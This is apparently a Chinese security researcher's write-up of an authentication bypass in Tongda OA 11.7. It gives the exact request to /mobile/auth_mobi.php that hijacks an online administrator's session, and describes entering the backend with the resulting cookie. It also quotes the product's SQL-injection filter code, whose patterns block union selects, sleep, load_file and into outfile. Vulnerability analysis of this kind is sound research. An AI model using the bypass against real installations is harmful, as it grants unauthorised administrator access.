通达OA11.7 任意用户登陆
通达OA 任意用户登陆
条件需要管理员在线
http://192.168.1.22/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
访问路径,覆盖了session直接用cookie登陆,访问目录/general/进入后台
这里已经登陆了。打开无痕模式
如果他什么都没有返回,说明是OK的。那么就利用当前的phpsessid进行访问
如果出现
RELOGIN
那说明。管理员不在线
漏洞形成的过程
这里查询了UID 是否在线。CLIENT 默认为0 这个0代表浏览器
这个表存的是当前用户的登陆信息。UID 和时间。sid 是phpssion 的值。然后client 是客户端标识符。看看sql 语句过滤了什么
function exequery($C, $Q, $QUERY_MASTER, $LOG) { $cursor = @db_query($Q, $C, $QUERY_MASTER); if (!$cursor) { PrintError("<b>" . _("SQL语句:") . "</b> " . $Q, $LOG); } return $cursor; }
db_query函数
function db_query($Q, $C, $QUERY_MASTER) { $Q = str_replace(" ", " ", $Q); sql_injection($Q); if (MYOA_DB_USE_REPLICATION && ($QUERY_MASTER || ((strtolower(substr(ltrim($Q), 0, 6)) != "select") && (strtolower(substr(ltrim($Q), 0, 3)) != "set")))) { if (($C == TD::$_res_conn) && ($C != TD::$_res_conn_master)) { if (!is_resource(TD::$_res_conn_master)) { TD::$_res_conn_master = openconnection(TD::$_arr_db_master, TD::$_arr_db_master["db"]); } $C = TD::$_res_conn_master; } else { if (($C == TD::$_res_conn_crscell) && ($C != TD::$_res_conn_crscell_master)) { if (!is_resource(TD::$_res_conn_crscell_master)) { TD::$_res_conn_crscell_master = openconnection(TD::$_arr_db_master, TD::$_arr_db_master["db_crscell"]); } $C = TD::$_res_conn_crscell_master; } } } return @mysql_query($Q, $C); }
sql_injection函数
function sql_injection($db_string) { $clean = ""; $error = ""; $old_pos = 0; $pos = -1; $db_string = str_replace(array("''", "\'"), "", $db_string); $db_string = preg_replace("/`[^,=\(\)]*'[^,=\(\)]*`/", "", $db_string); while (true) { $pos = strpos($db_string, "'", $pos + 1); if ($pos === false) { break; } $clean .= substr($db_string, $old_pos, $pos - $old_pos); while (true) { $pos1 = strpos($db_string, "'", $pos + 1); $pos2 = strpos($db_string, "\\", $pos + 1); if ($pos1 === false) { break; } else { if (($pos2 == false) || ($pos1 < $pos2)) { $pos = $pos1; break; } } $pos = $pos2 + 1; } $clean .= "\$s\$"; $old_pos = $pos + 1; } $clean .= substr($db_string, $old_pos); $clean = trim(strtolower(preg_replace(array("/\s+/s"), array(" "), $clean))); $fail = false; $matches = array(); if ((2 < strpos($clean, "/*")) || (strpos($clean, "--") !== false) || (strpos($clean, "#") !== false)) { $fail = true; $error = _("注释代码"); } else if (preg_match("/(^|[^a-z])union(\s+[a-z]*)*\s+select($|[^[a-z])/s", $clean) != 0) { $fail = true; $error = _("联合查询"); } else if (preg_match("/(^|[^a-z])(sleep|benchmark|load_file|mid|ord|ascii|extractvalue|updatexml|exp|current_user)\s*\(/s", $clean, $matches) != 0) { $fail = true; $error = $matches[2]; } else if (preg_match("/(^|[^a-z])into\s+outfile($|[^[a-z])/s", $clean) != 0) { $fail = true; $error = _("生成文件"); } else if (preg_match("/.*update.+user.+set.+file_priv.*/s", $clean) != 0) { $fail = true; $error = "set file_priv"; } else if (preg_match("/.*case.+when.+then.+end.*/s", $clean) != 0) { $fail = true; $error = "case when"; } else if (preg_match("/.*set.+general_log.*/s", $clean) != 0) { $fail = true; $error = "general_log"; } if ($fail) { echo _("不安全的SQL语句:") . $error . "<br />"; echo td_htmlspecialchars($db_string); exit(); } }
emmm 这个要是有注入。我也绕不过